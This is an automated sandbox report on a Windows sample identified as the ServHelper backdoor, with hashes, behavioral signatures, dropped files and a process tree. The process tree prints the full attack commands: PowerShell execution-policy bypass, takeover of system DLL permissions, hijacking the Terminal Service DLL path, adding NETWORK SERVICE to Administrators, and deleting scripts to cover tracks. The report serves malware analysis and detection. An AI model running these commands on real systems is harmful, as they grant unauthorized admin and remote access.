Analysis

  • max time kernel
    140s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    30-03-2024 21:36

General

  • Target

    44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe

  • Size

    4.2MB

  • MD5

    44d42138d67d0e52c3c26cb726bc8f39

  • SHA1

    2613e0e464b334ed66e34a8cffc174c5603dd1d9

  • SHA256

    074d3a0bcfb3d4b0b179a2495004fb95947de60ce002fded7af1d1781add9d2b

  • SHA512

    9d59b4dfb96bbe5b59f1b5c0561dafd8fe3f2fb1ababf4e7a384577ddf63adb703802187e7a7bfd671c4fd67e84214bb2b3283edae85e0f2a424148d9e0be1fa

  • SSDEEP

    98304:5RDQNYpuboTrhHZw1LhIArXs7YL8WVM872qAR:5RePbo3tZw17s7YQWg

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1164
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5oa2wids.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA592.tmp"
          4⤵
            PID:2228
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2464
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2840
        • C:\Windows\SysWOW64\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2064
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1996
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2800
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2220
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:796
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3028
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3000
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2972
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2252
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Sets DLL path for service in the registry
            • Modifies registry key
            PID:1324
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1860
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
                PID:1972
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  4⤵
                    PID:644
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  3⤵
                    PID:1612
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net start rdpdr
                      4⤵
                        PID:2080
                        • C:\Windows\SysWOW64\net.exe
                          net start rdpdr
                          5⤵
                            PID:1132
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 start rdpdr
                              6⤵
                                PID:1380
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                          3⤵
                            PID:1904
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net start TermService
                              4⤵
                                PID:836
                                • C:\Windows\SysWOW64\net.exe
                                  net start TermService
                                  5⤵
                                    PID:1388
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 start TermService
                                      6⤵
                                        PID:1672
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                  3⤵
                                    PID:2312
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                    3⤵
                                      PID:1256

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\5oa2wids.dll

                                  Filesize

                                  3KB

                                  MD5

                                  d5901f06a84713c86adabe83d1ee8da0

                                  SHA1

                                  ed9c23551f7802f0832e215dbb941070ba81a3e1

                                  SHA256

                                  299c44fd63a7f57a1e22528edee1e2cee067ef83edd846bf1d5721464459376b

                                  SHA512

                                  4fcc7ceea13ab288d27a2f26ac592cc7cff3ad0b0463f98d9f8982c3bf80d6e05a1346cb72da15ae200ce2d97af135624df83eedc5a2283c167d97b6201f0cd8

                                • C:\Users\Admin\AppData\Local\Temp\5oa2wids.pdb

                                  Filesize

                                  7KB

                                  MD5

                                  76e427872edc9c64a7e300d71b1b2354

                                  SHA1

                                  bef109c048d0e55601d9ac467c938c5d89348585

                                  SHA256

                                  4346d3165d52ac9b3a3912699f9bd7548bc233f9da6043f8f3f8242cdd505f16

                                  SHA512

                                  092d4c34e073cfb6f5b5ed9e9881f27cbfae5eddd43c018361b58341eee00c7bd6906c7a0c884fcd1f7fc796db00b682afed0b92fda99813d02e0c908ec56c87

                                • C:\Users\Admin\AppData\Local\Temp\RESA5A3.tmp

                                  Filesize

                                  1KB

                                  MD5

                                  86a63aff28e6394630a8faecf8212a29

                                  SHA1

                                  a3b0307e7c08e71509b5b6efba09ebea6066344d

                                  SHA256

                                  aa998be3fa5bac68398c0c0d2ef36b22ebfca00a19b962c993f1ba83f1bcc0df

                                  SHA512

                                  3946ee0cf2e9abca30306f7bb8e961e4aa78123b2973178906e8a242d793244b4c0d457e4253bb3f3c3d83ccdd48a63fd4979f9ffca96e0b2b33728207572c2c

                                • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                                  Filesize

                                  2.5MB

                                  MD5

                                  794bf0ae26a7efb0c516cf4a7692c501

                                  SHA1

                                  c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2

                                  SHA256

                                  97753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825

                                  SHA512

                                  20c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75

                                • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                  Filesize

                                  1KB

                                  MD5

                                  28d9755addec05c0b24cca50dfe3a92b

                                  SHA1

                                  7d3156f11c7a7fb60d29809caf93101de2681aa3

                                  SHA256

                                  abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                  SHA512

                                  891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                  Filesize

                                  7KB

                                  MD5

                                  1969ac801f35dbaeac457b79fb884a4d

                                  SHA1

                                  b22aaf23e8abee6da6091d9a5def33ed0ee40f57

                                  SHA256

                                  271ffb9d6e364584964e67185d0837da916ec67a8d8d7a2dec105978c6c25ef3

                                  SHA512

                                  25c9670244ea5722050306d542f5ae4e7cba8c73460ee22b6f127e74b9a89888f4449b4b83daad65b036e7cba5224ad85c1af800288ea252afb382a9d438352f

                                • C:\Windows\SysWOW64\rfxvmt.dll

                                  Filesize

                                  40KB

                                  MD5

                                  dc39d23e4c0e681fad7a3e1342a2843c

                                  SHA1

                                  58fd7d50c2dca464a128f5e0435d6f0515e62073

                                  SHA256

                                  6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                  SHA512

                                  5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                • \??\c:\Users\Admin\AppData\Local\Temp\5oa2wids.0.cs

                                  Filesize

                                  424B

                                  MD5

                                  9f8ab7eb0ab21443a2fe06dab341510e

                                  SHA1

                                  2b88b3116a79e48bab7114e18c9b9674e8a52165

                                  SHA256

                                  e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                  SHA512

                                  53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                • \??\c:\Users\Admin\AppData\Local\Temp\5oa2wids.cmdline

                                  Filesize

                                  309B

                                  MD5

                                  2ecfa8abbcb36496d70ae0749962b27c

                                  SHA1

                                  460a909aacb0b8465c134a066b9e6dc25cab8535

                                  SHA256

                                  ae60ab6963bf3c264c9036f8997d8119439a392dc8e5fd11f6c7919b9afb1719

                                  SHA512

                                  a35b7a260a99c7aaba589e2ece88580ae89dc67f7162c5ee33c679221d79f8828447edb5fd41b06f4d750094feea736c64b39edecb73a860d421b97d3d87c628

                                • \??\c:\Users\Admin\AppData\Local\Temp\CSCA592.tmp

                                  Filesize

                                  652B

                                  MD5

                                  80d278b11892a30cc946acf818d39c7d

                                  SHA1

                                  5e4c91cf5d4e77fa9229e8bef5e8ba2853966897

                                  SHA256

                                  3ed87b753f23a11553f621fa76419784777dd29876770e8df4d75ad91cafd13c

                                  SHA512

                                  6b47d4cef1373e1db0b3ced25de66420ab91ce0bc9205ede1e9c16a5154d13783216dca12f5bb0ecd930480cbb4fcf72e2966b7e96d3e84703ce1b719438c322

                                • memory/1164-6-0x0000000005680000-0x0000000005A84000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/1164-2-0x0000000000400000-0x0000000000841000-memory.dmp

                                  Filesize

                                  4.3MB

                                • memory/1164-1-0x0000000000B30000-0x0000000000F36000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/1164-0-0x0000000000B30000-0x0000000000F36000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/1164-13-0x0000000000B30000-0x0000000000F36000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/1164-7-0x0000000005240000-0x0000000005280000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/1164-24-0x0000000074550000-0x0000000074C3E000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/1164-36-0x0000000005240000-0x0000000005280000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/1164-5-0x0000000005240000-0x0000000005280000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/1164-4-0x0000000074550000-0x0000000074C3E000-memory.dmp

                                  Filesize

                                  6.9MB

                                • memory/1164-3-0x0000000000F40000-0x0000000001342000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/1656-46-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/1656-44-0x00000000004A0000-0x00000000004E0000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/1656-45-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/1656-43-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2140-15-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2140-64-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2140-16-0x0000000002650000-0x0000000002690000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2140-14-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2140-17-0x0000000002650000-0x0000000002690000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2140-69-0x0000000002650000-0x0000000002690000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2140-68-0x0000000002650000-0x0000000002690000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2140-67-0x0000000002650000-0x0000000002690000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2464-53-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2464-55-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2464-54-0x0000000002730000-0x0000000002770000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2464-52-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2840-63-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2840-62-0x0000000002480000-0x00000000024C0000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/2840-65-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB

                                • memory/2840-61-0x000000006F4F0000-0x000000006FA9B000-memory.dmp

                                  Filesize

                                  5.7MB